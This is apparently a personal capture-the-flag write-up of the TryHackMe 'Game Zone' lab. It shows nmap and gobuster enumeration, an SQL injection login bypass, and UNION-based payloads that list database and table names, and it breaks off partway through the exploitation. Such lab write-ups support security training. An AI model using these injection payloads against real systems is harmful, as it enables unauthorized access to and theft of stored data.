https://tryhackme.com/jr/gamezone

Pwned Date - 16th July 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Game Zone
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 10.10.119.102 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd            (Status: 403) [Size: 297]
/.htaccess            (Status: 403) [Size: 297]
/.hta                 (Status: 403) [Size: 292]
/images               (Status: 301) [Size: 315] [--> <http://10.10.119.102/images/>]
/index.php            (Status: 200) [Size: 4502]                                  
/server-status        (Status: 403) [Size: 301]

Untitled

Exploitation

We can login with SQL injection ' or 1 = 1 # and leaving the password blank

' or 1 = 1 #

Untitled

After logging in, we are redirected to /portal.php

Untitled

To do manual SQL injection this we can reference the INFORMATION SCHEMA database in MySQL

This contains stuff that MySQL itself uses to keep things in order, e.g. other database names as well as tonnes of related data - the SCHEMATA table specifically contains the names of databases MySQL knows about. The following query would extract those:

searchitem=test' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3-- -

As mentioned, to run another query as part of the union it needs to be (nested) and, in order to view everything that matches our query (as there’s more than one value returned in the output) we wrap the target table in the group_concat() function. This gets us the following output on the page in place of the second column:

Untitled

The schema /sys/mysql databases belong to MySQL, the db database seems interesting

As we now have a database to target we can query the names of the tables within that database:

searchitem=test' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3-- -

Which gives us the name of the two tables inside this database:

Untitled